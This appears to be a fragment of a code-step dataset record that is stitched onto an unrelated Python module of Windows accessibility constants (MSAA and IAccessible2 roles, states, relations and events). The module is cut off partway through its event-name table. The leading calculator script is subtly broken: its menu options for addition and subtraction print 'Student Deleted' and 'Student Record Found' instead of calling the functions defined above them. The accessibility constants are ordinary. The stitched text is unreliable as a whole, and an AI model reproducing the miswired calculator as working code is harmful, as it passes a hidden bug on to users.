"step-5": "def multiplica():\r\n one = int(input('1º: '))\r\n two = int(input('2º: '))\r\n\r\n print('a multiplicação é: ', one*two)\r\n\r\ndef soma():\r\n one = int(input('1º: '))\r\n two = int(input('2º: '))\r\n\r\n print('a soma é: ', one+two)\r\n \r\ndef subtra():\r\n one = int(input('1º: '))\r\n two = int(input('2º: '))\r\n\r\n print('a subtração é: ', one-two)\r\n\r\nans=True\r\nwhile ans:\r\n print (\"\"\"\r\n 1.Multiplicação\r\n 2.Soma\r\n 3.Subtração\r\n 4.Exit/Quit\r\n \"\"\")\r\n ans= int(input(\"What would you like to do? \"))\r\n if ans== 1: \r\n multiplica() \r\n elif ans== 2:\r\n print(\"\\n Student Deleted\") \r\n elif ans== 3:\r\n print(\"\\n Student Record Found\") \r\n elif ans== 4:\r\n print(\"\\n Goodbye\") \r\n exit()\r\n else:\r\n print(\"\\n Not Valid Choice Try again\") \r\n\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
'''
Useful constants.
Inspired by pyatspi:
http://live.gnome.org/GAP/PythonATSPI
@author: Eitan Isaacson
@copyright: Copyright (c) 2008, Eitan Isaacson
@license: LGPL
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Library General Public
License as published by the Free Software Foundation; either
version 2 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Library General Public License for more details.
You should have received a copy of the GNU Library General Public
License along with this library; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
'''
# Child ID.
CHILDID_SELF = 0
# IAccessibleText Constants
IA2_TEXT_OFFSET_LENGTH = -1
IA2_TEXT_OFFSET_CARET = -2
# Accessible Roles
# TODO: Is there a way to retrieve this at runtime or build time?
#
ROLE_SYSTEM_ALERT = 8
ROLE_SYSTEM_ANIMATION = 54
ROLE_SYSTEM_APPLICATION = 14
ROLE_SYSTEM_BORDER = 19
ROLE_SYSTEM_BUTTONDROPDOWN = 56
ROLE_SYSTEM_BUTTONDROPDOWNGRID = 58
ROLE_SYSTEM_BUTTONMENU = 57
ROLE_SYSTEM_CARET = 7
ROLE_SYSTEM_CELL = 29
ROLE_SYSTEM_CHARACTER = 32
ROLE_SYSTEM_CHART = 17
ROLE_SYSTEM_CHECKBUTTON = 44
ROLE_SYSTEM_CLIENT = 10
ROLE_SYSTEM_CLOCK = 61
ROLE_SYSTEM_COLUMN = 27
ROLE_SYSTEM_COLUMNHEADER = 25
ROLE_SYSTEM_COMBOBOX = 46
ROLE_SYSTEM_CURSOR = 6
ROLE_SYSTEM_DIAGRAM = 53
ROLE_SYSTEM_DIAL = 49
ROLE_SYSTEM_DIALOG = 18
ROLE_SYSTEM_DOCUMENT = 15
ROLE_SYSTEM_DROPLIST = 47
ROLE_SYSTEM_EQUATION = 55
ROLE_SYSTEM_GRAPHIC = 40
ROLE_SYSTEM_GRIP = 4
ROLE_SYSTEM_GROUPING = 20
ROLE_SYSTEM_HELPBALLOON = 31
ROLE_SYSTEM_HOTKEYFIELD = 50
ROLE_SYSTEM_INDICATOR = 39
ROLE_SYSTEM_LINK = 30
ROLE_SYSTEM_LIST = 33
ROLE_SYSTEM_LISTITEM = 34
ROLE_SYSTEM_MENUBAR = 2
ROLE_SYSTEM_MENUITEM = 12
ROLE_SYSTEM_MENUPOPUP = 11
ROLE_SYSTEM_OUTLINE = 35
ROLE_SYSTEM_OUTLINEITEM = 36
ROLE_SYSTEM_PAGETAB = 37
ROLE_SYSTEM_PAGETABLIST = 60
ROLE_SYSTEM_PANE = 16
ROLE_SYSTEM_PROGRESSBAR = 48
ROLE_SYSTEM_PROPERTYPAGE = 38
ROLE_SYSTEM_PUSHBUTTON = 43
ROLE_SYSTEM_RADIOBUTTON = 45
ROLE_SYSTEM_ROW = 28
ROLE_SYSTEM_ROWHEADER = 26
ROLE_SYSTEM_SCROLLBAR = 3
ROLE_SYSTEM_SEPARATOR = 21
ROLE_SYSTEM_SLIDER = 51
ROLE_SYSTEM_SOUND = 5
ROLE_SYSTEM_SPINBUTTON = 52
ROLE_SYSTEM_STATICTEXT = 41
ROLE_SYSTEM_STATUSBAR = 23
ROLE_SYSTEM_TABLE = 24
ROLE_SYSTEM_TEXT = 42
ROLE_SYSTEM_TITLEBAR = 1
ROLE_SYSTEM_TOOLBAR = 22
ROLE_SYSTEM_TOOLTIP = 13
ROLE_SYSTEM_WHITESPACE = 59
ROLE_SYSTEM_WINDOW = 9
IA2_ROLE_UNKNOWN = 0
IA2_ROLE_CANVAS = 0x401
IA2_ROLE_CAPTION = 0x402
IA2_ROLE_CHECK_MENU_ITEM = 0x403
IA2_ROLE_COLOR_CHOOSER = 0x404
IA2_ROLE_DATE_EDITOR = 0x405
IA2_ROLE_DESKTOP_ICON = 0x406
IA2_ROLE_DESKTOP_PANE = 0x407
IA2_ROLE_DIRECTORY_PANE = 0x408
IA2_ROLE_EDITBAR = 0x409
IA2_ROLE_EMBEDDED_OBJECT = 0x40a
IA2_ROLE_ENDNOTE = 0x40b
IA2_ROLE_FILE_CHOOSER = 0x40c
IA2_ROLE_FONT_CHOOSER = 0x40d
IA2_ROLE_FOOTER = 0x40e
IA2_ROLE_FOOTNOTE = 0x40f
IA2_ROLE_FORM = 0x410
IA2_ROLE_FRAME = 0x411
IA2_ROLE_GLASS_PANE = 0x412
IA2_ROLE_HEADER = 0x413
IA2_ROLE_HEADING = 0x414
IA2_ROLE_ICON = 0x415
IA2_ROLE_IMAGE_MAP = 0x416
IA2_ROLE_INPUT_METHOD_WINDOW = 0x417
IA2_ROLE_INTERNAL_FRAME = 0x418
IA2_ROLE_LABEL = 0x419
IA2_ROLE_LAYERED_PANE = 0x41a
IA2_ROLE_NOTE = 0x41b
IA2_ROLE_OPTION_PANE = 0x41c
IA2_ROLE_PAGE = 0x41d
IA2_ROLE_PARAGRAPH = 0x41e
IA2_ROLE_RADIO_MENU_ITEM = 0x41f
IA2_ROLE_REDUNDANT_OBJECT = 0x420
IA2_ROLE_ROOT_PANE = 0x421
IA2_ROLE_RULER = 0x422
IA2_ROLE_SCROLL_PANE = 0x423
IA2_ROLE_SECTION = 0x424
IA2_ROLE_SHAPE = 0x425
IA2_ROLE_SPLIT_PANE = 0x426
IA2_ROLE_TEAR_OFF_MENU = 0x427
IA2_ROLE_TERMINAL = 0x428
IA2_ROLE_TEXT_FRAME = 0x429
IA2_ROLE_TOGGLE_BUTTON = 0x42a
IA2_ROLE_VIEW_PORT = 0x42b
IA2_ROLE_COMPLEMENTARY_CONTENT = 0x42c
IA2_ROLE_LANDMARK = 0x42d
# Unlocalized role strings
UNLOCALIZED_ROLE_NAMES = {
1: u'ROLE_SYSTEM_TITLEBAR',
2: u'ROLE_SYSTEM_MENUBAR',
3: u'ROLE_SYSTEM_SCROLLBAR',
4: u'ROLE_SYSTEM_GRIP',
5: u'ROLE_SYSTEM_SOUND',
6: u'ROLE_SYSTEM_CURSOR',
7: u'ROLE_SYSTEM_CARET',
8: u'ROLE_SYSTEM_ALERT',
9: u'ROLE_SYSTEM_WINDOW',
10: u'ROLE_SYSTEM_CLIENT',
11: u'ROLE_SYSTEM_MENUPOPUP',
12: u'ROLE_SYSTEM_MENUITEM',
13: u'ROLE_SYSTEM_TOOLTIP',
14: u'ROLE_SYSTEM_APPLICATION',
15: u'ROLE_SYSTEM_DOCUMENT',
16: u'ROLE_SYSTEM_PANE',
17: u'ROLE_SYSTEM_CHART',
18: u'ROLE_SYSTEM_DIALOG',
19: u'ROLE_SYSTEM_BORDER',
20: u'ROLE_SYSTEM_GROUPING',
21: u'ROLE_SYSTEM_SEPARATOR',
22: u'ROLE_SYSTEM_TOOLBAR',
23: u'ROLE_SYSTEM_STATUSBAR',
24: u'ROLE_SYSTEM_TABLE',
25: u'ROLE_SYSTEM_COLUMNHEADER',
26: u'ROLE_SYSTEM_ROWHEADER',
27: u'ROLE_SYSTEM_COLUMN',
28: u'ROLE_SYSTEM_ROW',
29: u'ROLE_SYSTEM_CELL',
30: u'ROLE_SYSTEM_LINK',
31: u'ROLE_SYSTEM_HELPBALLOON',
32: u'ROLE_SYSTEM_CHARACTER',
33: u'ROLE_SYSTEM_LIST',
34: u'ROLE_SYSTEM_LISTITEM',
35: u'ROLE_SYSTEM_OUTLINE',
36: u'ROLE_SYSTEM_OUTLINEITEM',
37: u'ROLE_SYSTEM_PAGETAB',
38: u'ROLE_SYSTEM_PROPERTYPAGE',
39: u'ROLE_SYSTEM_INDICATOR',
40: u'ROLE_SYSTEM_GRAPHIC',
41: u'ROLE_SYSTEM_STATICTEXT',
42: u'ROLE_SYSTEM_TEXT',
43: u'ROLE_SYSTEM_PUSHBUTTON',
44: u'ROLE_SYSTEM_CHECKBUTTON',
45: u'ROLE_SYSTEM_RADIOBUTTON',
46: u'ROLE_SYSTEM_COMBOBOX',
47: u'ROLE_SYSTEM_DROPLIST',
48: u'ROLE_SYSTEM_PROGRESSBAR',
49: u'ROLE_SYSTEM_DIAL',
50: u'ROLE_SYSTEM_HOTKEYFIELD',
51: u'ROLE_SYSTEM_SLIDER',
52: u'ROLE_SYSTEM_SPINBUTTON',
53: u'ROLE_SYSTEM_DIAGRAM',
54: u'ROLE_SYSTEM_ANIMATION',
55: u'ROLE_SYSTEM_EQUATION',
56: u'ROLE_SYSTEM_BUTTONDROPDOWN',
57: u'ROLE_SYSTEM_BUTTONMENU',
58: u'ROLE_SYSTEM_BUTTONDROPDOWNGRID',
59: u'ROLE_SYSTEM_WHITESPACE',
60: u'ROLE_SYSTEM_PAGETABLIST',
61: u'ROLE_SYSTEM_CLOCK'}
# Unlocalized IA2 role strings
UNLOCALIZED_IA2_ROLE_NAMES = {
0x000: u'IA2_ROLE_UNKNOWN',
0x401: u'IA2_ROLE_CANVAS',
0x402: u'IA2_ROLE_CAPTION',
0x403: u'IA2_ROLE_CHECK_MENU_ITEM',
0x404: u'IA2_ROLE_COLOR_CHOOSER',
0x405: u'IA2_ROLE_DATE_EDITOR',
0x406: u'IA2_ROLE_DESKTOP_ICON',
0x407: u'IA2_ROLE_DESKTOP_PANE',
0x408: u'IA2_ROLE_DIRECTORY_PANE',
0x409: u'IA2_ROLE_EDITBAR',
0x40a: u'IA2_ROLE_EMBEDDED_OBJECT',
0x40b: u'IA2_ROLE_ENDNOTE',
0x40c: u'IA2_ROLE_FILE_CHOOSER',
0x40d: u'IA2_ROLE_FONT_CHOOSER',
0x40e: u'IA2_ROLE_FOOTER',
0x40f: u'IA2_ROLE_FOOTNOTE',
0x410: u'IA2_ROLE_FORM',
0x411: u'IA2_ROLE_FRAME',
0x412: u'IA2_ROLE_GLASS_PANE',
0x413: u'IA2_ROLE_HEADER',
0x414: u'IA2_ROLE_HEADING',
0x415: u'IA2_ROLE_ICON',
0x416: u'IA2_ROLE_IMAGE_MAP',
0x417: u'IA2_ROLE_INPUT_METHOD_WINDOW',
0x418: u'IA2_ROLE_INTERNAL_FRAME',
0x419: u'IA2_ROLE_LABEL',
0x41a: u'IA2_ROLE_LAYERED_PANE',
0x41b: u'IA2_ROLE_NOTE',
0x41c: u'IA2_ROLE_OPTION_PANE',
0x41d: u'IA2_ROLE_PAGE',
0x41e: u'IA2_ROLE_PARAGRAPH',
0x41f: u'IA2_ROLE_RADIO_MENU_ITEM',
0x420: u'IA2_ROLE_REDUNDANT_OBJECT',
0x421: u'IA2_ROLE_ROOT_PANE',
0x422: u'IA2_ROLE_RULER',
0x423: u'IA2_ROLE_SCROLL_PANE',
0x424: u'IA2_ROLE_SECTION',
0x425: u'IA2_ROLE_SHAPE',
0x426: u'IA2_ROLE_SPLIT_PANE',
0x427: u'IA2_ROLE_TEAR_OFF_MENU',
0x428: u'IA2_ROLE_TERMINAL',
0x429: u'IA2_ROLE_TEXT_FRAME',
0x42a: u'IA2_ROLE_TOGGLE_BUTTON',
0x42b: u'IA2_ROLE_VIEW_PORT',
0x42c: u'IA2_ROLE_COMPLEMENTARY_CONTENT',
0x42d: u'IA2_ROLE_LANDMARK'}
# Navigation constants
NAVDIR_DOWN = 2
NAVDIR_FIRSTCHILD = 7
NAVDIR_LASTCHILD = 8
NAVDIR_LEFT = 3
NAVDIR_NEXT = 5
NAVDIR_PREVIOUS = 6
NAVDIR_RIGHT = 4
NAVDIR_UP = 1
STATE_SYSTEM_UNAVAILABLE = 0x1
STATE_SYSTEM_SELECTED = 0x2
STATE_SYSTEM_FOCUSED = 0x4
STATE_SYSTEM_PRESSED = 0x8
STATE_SYSTEM_CHECKED = 0x10
STATE_SYSTEM_MIXED = 0x20
STATE_SYSTEM_READONLY = 0x40
STATE_SYSTEM_HOTTRACKED = 0x80
STATE_SYSTEM_DEFAULT = 0x100
STATE_SYSTEM_EXPANDED = 0x200
STATE_SYSTEM_COLLAPSED = 0x400
STATE_SYSTEM_BUSY = 0x800
STATE_SYSTEM_FLOATING = 0x1000
STATE_SYSTEM_MARQUEED = 0x2000
STATE_SYSTEM_ANIMATED = 0x4000
STATE_SYSTEM_INVISIBLE = 0x8000
STATE_SYSTEM_OFFSCREEN = 0x10000
STATE_SYSTEM_SIZEABLE = 0x20000
STATE_SYSTEM_MOVEABLE = 0x40000
STATE_SYSTEM_SELFVOICING = 0x80000
STATE_SYSTEM_FOCUSABLE = 0x100000
STATE_SYSTEM_SELECTABLE = 0x200000
STATE_SYSTEM_LINKED = 0x400000
STATE_SYSTEM_TRAVERSED = 0x800000
STATE_SYSTEM_MULTISELECTABLE = 0x1000000
STATE_SYSTEM_EXTSELECTABLE = 0x2000000
STATE_SYSTEM_HASSUBMENU = 0x4000000
STATE_SYSTEM_ALERT_LOW = 0x4000000
STATE_SYSTEM_ALERT_MEDIUM = 0x8000000
STATE_SYSTEM_ALERT_HIGH = 0x10000000
STATE_SYSTEM_PROTECTED = 0x20000000
STATE_SYSTEM_HASPOPUP = 0x40000000
STATE_SYSTEM_VALID = 0x1fffffff
# Unlocalized state strings
UNLOCALIZED_STATE_NAMES = {
1: u'STATE_SYSTEM_UNAVAILABLE',
2: u'STATE_SYSTEM_SELECTED',
4: u'STATE_SYSTEM_FOCUSED',
8: u'STATE_SYSTEM_PRESSED',
16: u'STATE_SYSTEM_CHECKED',
32: u'STATE_SYSTEM_MIXED',
64: u'STATE_SYSTEM_READONLY',
128: u'STATE_SYSTEM_HOTTRACKED',
256: u'STATE_SYSTEM_DEFAULT',
512: u'STATE_SYSTEM_EXPANDED',
1024: u'STATE_SYSTEM_COLLAPSED',
2048: u'STATE_SYSTEM_BUSY',
4096: u'STATE_SYSTEM_FLOATING',
8192: u'STATE_SYSTEM_MARQUEED',
16384: u'STATE_SYSTEM_ANIMATED',
32768: u'STATE_SYSTEM_INVISIBLE',
65536: u'STATE_SYSTEM_OFFSCREEN',
131072: u'STATE_SYSTEM_SIZEABLE',
262144: u'STATE_SYSTEM_MOVEABLE',
524288: u'STATE_SYSTEM_SELFVOICING',
1048576: u'STATE_SYSTEM_FOCUSABLE',
2097152: u'STATE_SYSTEM_SELECTABLE',
4194304: u'STATE_SYSTEM_LINKED',
8388608: u'STATE_SYSTEM_TRAVERSED',
16777216: u'STATE_SYSTEM_MULTISELECTABLE',
33554432: u'STATE_SYSTEM_EXTSELECTABLE',
67108864: u'STATE_SYSTEM_ALERT_LOW',
134217728: u'STATE_SYSTEM_ALERT_MEDIUM',
268435456: u'STATE_SYSTEM_ALERT_HIGH',
536870912: u'STATE_SYSTEM_PROTECTED',
1073741824: u'STATE_SYSTEM_HASPOPUP',
0x1fffffff: u'STATE_SYSTEM_VALID'}
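# Added sketch (not in the original module): MSAA states are bit flags, so a raw
# accState value decodes by masking against the table above. decode_states() is
# an illustrative helper, not part of the original API.
def decode_states(state, names=UNLOCALIZED_STATE_NAMES):
    # STATE_SYSTEM_VALID is a composite mask rather than a flag, so skip it
    return [name for bit, name in names.items()
            if bit != STATE_SYSTEM_VALID and state & bit]

# e.g. decode_states(STATE_SYSTEM_FOCUSED | STATE_SYSTEM_FOCUSABLE)
# -> [u'STATE_SYSTEM_FOCUSED', u'STATE_SYSTEM_FOCUSABLE'] (ordering may vary)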
IA2_STATE_ACTIVE = 0x1
IA2_STATE_ARMED = 0x2
IA2_STATE_DEFUNCT = 0x4
IA2_STATE_EDITABLE = 0x8
IA2_STATE_HORIZONTAL = 0x10
IA2_STATE_ICONIFIED = 0x20
IA2_STATE_INVALID_ENTRY = 0x40
IA2_STATE_MANAGES_DESCENDANTS = 0x80
IA2_STATE_MODAL = 0x100
IA2_STATE_MULTI_LINE = 0x200
IA2_STATE_OPAQUE = 0x400
IA2_STATE_REQUIRED = 0x800
IA2_STATE_SELECTABLE_TEXT = 0x1000
IA2_STATE_SINGLE_LINE = 0x2000
IA2_STATE_STALE = 0x4000
IA2_STATE_SUPPORTS_AUTOCOMPLETION = 0x8000
IA2_STATE_TRANSIENT = 0x10000
IA2_STATE_VERTICAL = 0x20000
IA2_STATE_CHECKABLE = 0x40000
IA2_STATE_PINNED = 0x80000
UNLOCALIZED_IA2_STATE_NAMES = {
1: u'IA2_STATE_ACTIVE',
2: u'IA2_STATE_ARMED',
4: u'IA2_STATE_DEFUNCT',
8: u'IA2_STATE_EDITABLE',
16: u'IA2_STATE_HORIZONTAL',
32: u'IA2_STATE_ICONIFIED',
64: u'IA2_STATE_INVALID_ENTRY',
128: u'IA2_STATE_MANAGES_DESCENDANTS',
256: u'IA2_STATE_MODAL',
512: u'IA2_STATE_MULTI_LINE',
1024: u'IA2_STATE_OPAQUE',
2048: u'IA2_STATE_REQUIRED',
4096: u'IA2_STATE_SELECTABLE_TEXT',
8192: u'IA2_STATE_SINGLE_LINE',
16384: u'IA2_STATE_STALE',
32768: u'IA2_STATE_SUPPORTS_AUTOCOMPLETION',
65536: u'IA2_STATE_TRANSIENT',
131072: u'IA2_STATE_VERTICAL',
262144: u'IA2_STATE_CHECKABLE',
524288: u'IA2_STATE_PINNED'}
UNLOCALIZED_IA2_RELATION_TYPES = {
u'containingApplication' : u'IA2_RELATION_CONTAINING_APPLICATION',
u'containingDocument' : u'IA2_RELATION_CONTAINING_DOCUMENT',
u'containingTabPane' : u'IA2_RELATION_CONTAINING_TAB_PANE',
u'containingWindow' : u'IA2_RELATION_CONTAINING_WINDOW',
u'controlledBy' : u'IA2_RELATION_CONTROLLED_BY',
u'controllerFor' : u'IA2_RELATION_CONTROLLER_FOR',
u'describedBy' : u'IA2_RELATION_DESCRIBED_BY',
u'descriptionFor' : u'IA2_RELATION_DESCRIPTION_FOR',
u'details' : u'IA2_RELATION_DETAILS',
u'detailsFor' : u'IA2_RELATION_DETAILS_FOR',
u'embeddedBy' : u'IA2_RELATION_EMBEDDED_BY',
u'embeds' : u'IA2_RELATION_EMBEDS',
u'errorMessage' : u'IA2_RELATION_ERROR_MESSAGE',
u'errorFor' : u'IA2_RELATION_ERROR_FOR',
u'flowsFrom' : u'IA2_RELATION_FLOWS_FROM',
u'flowsTo' : u'IA2_RELATION_FLOWS_TO',
u'labelFor' : u'IA2_RELATION_LABEL_FOR',
    # IA2_RELATION_LABELED_BY and IA2_RELATION_LABELLED_BY share the key string,
    # so only one dict entry can survive; keep the spelled-out form
    u'labelledBy' : u'IA2_RELATION_LABELLED_BY',
u'memberOf' : u'IA2_RELATION_MEMBER_OF',
u'nextTabbable' : u'IA2_RELATION_NEXT_TABBABLE',
u'nodeChildOf' : u'IA2_RELATION_NODE_CHILD_OF',
u'nodeParentOf' : u'IA2_RELATION_NODE_PARENT_OF',
u'parentWindowOf' : u'IA2_RELATION_PARENT_WINDOW_OF',
u'popupFor' : u'IA2_RELATION_POPUP_FOR',
u'previousTabbable' : u'IA2_RELATION_PREVIOUS_TABBABLE',
u'subwindowOf' : u'IA2_RELATION_SUBWINDOW_OF'}
# SetWinEventHook() flags
WINEVENT_OUTOFCONTEXT = 0x0
WINEVENT_SKIPOWNTHREAD =0x1
WINEVENT_SKIPOWNPROCESS = 0x2
WINEVENT_INCONTEXT = 0x4
# win events
EVENT_SYSTEM_SOUND = 0x1
EVENT_SYSTEM_ALERT = 0x2
EVENT_SYSTEM_FOREGROUND = 0x3
EVENT_SYSTEM_MENUSTART = 0x4
EVENT_SYSTEM_MENUEND = 0x5
EVENT_SYSTEM_MENUPOPUPSTART = 0x6
EVENT_SYSTEM_MENUPOPUPEND = 0x7
EVENT_SYSTEM_CAPTURESTART = 0x8
EVENT_SYSTEM_CAPTUREEND = 0x9
EVENT_SYSTEM_MOVESIZESTART = 0xa
EVENT_SYSTEM_MOVESIZEEND = 0xb
EVENT_SYSTEM_CONTEXTHELPSTART = 0xc
EVENT_SYSTEM_CONTEXTHELPEND = 0xd
EVENT_SYSTEM_DRAGDROPSTART = 0xe
EVENT_SYSTEM_DRAGDROPEND = 0xf
EVENT_SYSTEM_DIALOGSTART = 0x10
EVENT_SYSTEM_DIALOGEND = 0x11
EVENT_SYSTEM_SCROLLINGSTART = 0x12
EVENT_SYSTEM_SCROLLINGEND = 0x13
EVENT_SYSTEM_SWITCHSTART = 0x14
EVENT_SYSTEM_SWITCHEND = 0x15
EVENT_SYSTEM_MINIMIZESTART = 0x16
EVENT_SYSTEM_MINIMIZEEND = 0x17
EVENT_OBJECT_CREATE = 0x8000
EVENT_OBJECT_DESTROY = 0x8001
EVENT_OBJECT_SHOW = 0x8002
EVENT_OBJECT_HIDE = 0x8003
EVENT_OBJECT_REORDER = 0x8004
EVENT_OBJECT_FOCUS = 0x8005
EVENT_OBJECT_SELECTION = 0x8006
EVENT_OBJECT_SELECTIONADD = 0x8007
EVENT_OBJECT_SELECTIONREMOVE = 0x8008
EVENT_OBJECT_SELECTIONWITHIN = 0x8009
EVENT_OBJECT_STATECHANGE = 0x800a
EVENT_OBJECT_LOCATIONCHANGE = 0x800b
EVENT_OBJECT_NAMECHANGE = 0x800c
EVENT_OBJECT_DESCRIPTIONCHANGE = 0x800d
EVENT_OBJECT_VALUECHANGE = 0x800e
EVENT_OBJECT_PARENTCHANGE = 0x800f
EVENT_OBJECT_HELPCHANGE = 0x8010
EVENT_OBJECT_DEFACTIONCHANGE = 0x8011
EVENT_OBJECT_ACCELERATORCHANGE = 0x8012
EVENT_CONSOLE_CARET = 0x4001
EVENT_CONSOLE_UPDATE_REGION = 0x4002
EVENT_CONSOLE_UPDATE_SIMPLE = 0x4003
EVENT_CONSOLE_UPDATE_SCROLL = 0x4004
EVENT_CONSOLE_LAYOUT = 0x4005
EVENT_CONSOLE_START_APPLICATION = 0x4006
EVENT_CONSOLE_END_APPLICATION = 0x4007
# IAccessible2 events
IA2_EVENT_ACTION_CHANGED = 0x101
IA2_EVENT_ACTIVE_DECENDENT_CHANGED = 0x102
IA2_EVENT_ACTIVE_DESCENDANT_CHANGED = 0x102
IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED = 0x103
IA2_EVENT_DOCUMENT_CONTENT_CHANGED = 0x104
IA2_EVENT_DOCUMENT_LOAD_COMPLETE = 0x105
IA2_EVENT_DOCUMENT_LOAD_STOPPED = 0x106
IA2_EVENT_DOCUMENT_RELOAD = 0x107
IA2_EVENT_HYPERLINK_END_INDEX_CHANGED = 0x108
IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED = 0x109
IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED = 0x10a
IA2_EVENT_HYPERTEXT_LINK_ACTIVATED = 0x10b
IA2_EVENT_HYPERTEXT_LINK_SELECTED = 0x10c
IA2_EVENT_HYPERLINK_START_INDEX_CHANGED = 0x10d
IA2_EVENT_HYPERTEXT_CHANGED = 0x10e
# 0x10f and 0x110 per the IA2 spec (see UNLOCALIZED_EVENT_NAMES below);
# 0x11f and 0x120 belong to IA2_EVENT_TEXT_REMOVED and IA2_EVENT_TEXT_UPDATED
IA2_EVENT_HYPERTEXT_NLINKS_CHANGED = 0x10f
IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED = 0x110
IA2_EVENT_PAGE_CHANGED = 0x111
IA2_EVENT_SECTION_CHANGED = 0x112
IA2_EVENT_TABLE_CAPTION_CHANGED = 0x113
IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED = 0x114
IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED = 0x115
IA2_EVENT_TABLE_MODEL_CHANGED = 0x116
IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED = 0x117
IA2_EVENT_TABLE_ROW_HEADER_CHANGED = 0x118
IA2_EVENT_TABLE_SUMMARY_CHANGED = 0x119
IA2_EVENT_TEXT_ATTRIBUTE_CHANGED = 0x11a
IA2_EVENT_TEXT_CARET_MOVED = 0x11b
IA2_EVENT_TEXT_CHANGED = 0x11c
IA2_EVENT_TEXT_COLUMN_CHANGED = 0x11d
IA2_EVENT_TEXT_INSERTED = 0x11e
IA2_EVENT_TEXT_REMOVED = 0x11f
IA2_EVENT_TEXT_UPDATED = 0x120
IA2_EVENT_TEXT_SELECTION_CHANGED = 0x121
IA2_EVENT_VISIBLE_DATA_CHANGED = 0x122
UNLOCALIZED_EVENT_NAMES = {
0x1: u'EVENT_SYSTEM_SOUND',
0x2: u'EVENT_SYSTEM_ALERT',
0x3: u'EVENT_SYSTEM_FOREGROUND',
0x4: u'EVENT_SYSTEM_MENUSTART',
0x5: u'EVENT_SYSTEM_MENUEND',
0x6: u'EVENT_SYSTEM_MENUPOPUPSTART',
0x7: u'EVENT_SYSTEM_MENUPOPUPEND',
0x8: u'EVENT_SYSTEM_CAPTURESTART',
0x9: u'EVENT_SYSTEM_CAPTUREEND',
0xa: u'EVENT_SYSTEM_MOVESIZESTART',
0xb: u'EVENT_SYSTEM_MOVESIZEEND',
0xc: u'EVENT_SYSTEM_CONTEXTHELPSTART',
0xd: u'EVENT_SYSTEM_CONTEXTHELPEND',
0xe: u'EVENT_SYSTEM_DRAGDROPSTART',
0xf: u'EVENT_SYSTEM_DRAGDROPEND',
0x10: u'EVENT_SYSTEM_DIALOGSTART',
0x11: u'EVENT_SYSTEM_DIALOGEND',
0x12: u'EVENT_SYSTEM_SCROLLINGSTART',
0x13: u'EVENT_SYSTEM_SCROLLINGEND',
0x14: u'EVENT_SYSTEM_SWITCHSTART',
0x15: u'EVENT_SYSTEM_SWITCHEND',
0x16: u'EVENT_SYSTEM_MINIMIZESTART',
0x17: u'EVENT_SYSTEM_MINIMIZEEND',
0x101: u'IA2_EVENT_ACTION_CHANGED',
0x102: u'IA2_EVENT_ACTIVE_DESCENDANT_CHANGED',
0x103: u'IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED',
0x104: u'IA2_EVENT_DOCUMENT_CONTENT_CHANGED',
0x105: u'IA2_EVENT_DOCUMENT_LOAD_COMPLETE',
0x106: u'IA2_EVENT_DOCUMENT_LOAD_STOPPED',
0x107: u'IA2_EVENT_DOCUMENT_RELOAD',
0x108: u'IA2_EVENT_HYPERLINK_END_INDEX_CHANGED',
0x109: u'IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED',
0x10a: u'IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED',
0x10b: u'IA2_EVENT_HYPERTEXT_LINK_ACTIVATED',
0x10c: u'IA2_EVENT_HYPERTEXT_LINK_SELECTED',
0x10d: u'IA2_EVENT_HYPERLINK_START_INDEX_CHANGED',
0x10e: u'IA2_EVENT_HYPERTEXT_CHANGED',
0x10f: u'IA2_EVENT_HYPERTEXT_NLINKS_CHANGED',
0x110: u'IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED',
0x111: u'IA2_EVENT_PAGE_CHANGED',
0x112: u'IA2_EVENT_SECTION_CHANGED',
0x113: u'IA2_EVENT_TABLE_CAPTION_CHANGED',
0x114: u'IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED',
0x115: u'IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED',
0x116: u'IA2_EVENT_TABLE_MODEL_CHANGED',
0x117: u'IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED',
0x118: u'IA2_EVENT_TABLE_ROW_HEADER_CHANGED',
0x119: u'IA2_EVENT_TABLE_SUMMARY_CHANGED',
0x11a: u'IA2_EVENT_TEXT_ATTRIBUTE_CHANGED',
0x11b: u'IA2_EVENT_TEXT_CARET_MOVED',
0x11c: u'IA2_EVENT_TEXT_CHANGED',
0x11d: u'IA2_EVENT_TEXT_COLUMN_CHANGED',
0x11e: u'IA2_EVENT_TEXT_INSERTED',
0x11f: u'IA2_EVENT_TEXT_REMOVED',
0x120: u'IA2_EVENT_TEXT_UPDATED',
0x121: u'IA2_EVENT_TEXT_SELECTION_CHANGED',
0x122: u'IA2_EVENT_VISIBLE_DATA_CHANGED',
0x4001: u'EVENT_CONSOLE_CARET',
0x4002: u'EVENT_CONSOLE_UPDATE_REGION',
0x4003: u'EVENT_CONSOLE_UPDATE_SIMPLE',
0x4004: u'EVENT_CONSOLE_UPDATE_SCROLL',
0x4005: u'EVENT_CONSOLE_LAYOUT',
0x4006: u'EVENT_CONSOLE_START_APPLICATION',
0x4007: u'EVENT_CONSOLE_END_APPLICATION',
0x8000: u'EVENT_OBJECT_CREATE',
0x8001: u'EVENT_OBJECT_DESTROY',
0x8002: u'EVENT_OBJECT_SHOW',
0x8003: u'EVENT_OBJECT_HIDE',
0x8004: u'EVENT_OBJECT_REORDER',
0x8005: u'EVENT_OBJECT_FOCUS',
0x8006: u'EVENT_OBJECT_SELECTION',
0x8007: u'EVENT_OBJECT_SELECTIONADD',
0x8008: u'EVENT_OBJECT_SELECTIONREMOVE',
0x8009: u'EVENT_OBJECT_SELECTIONWITHIN',
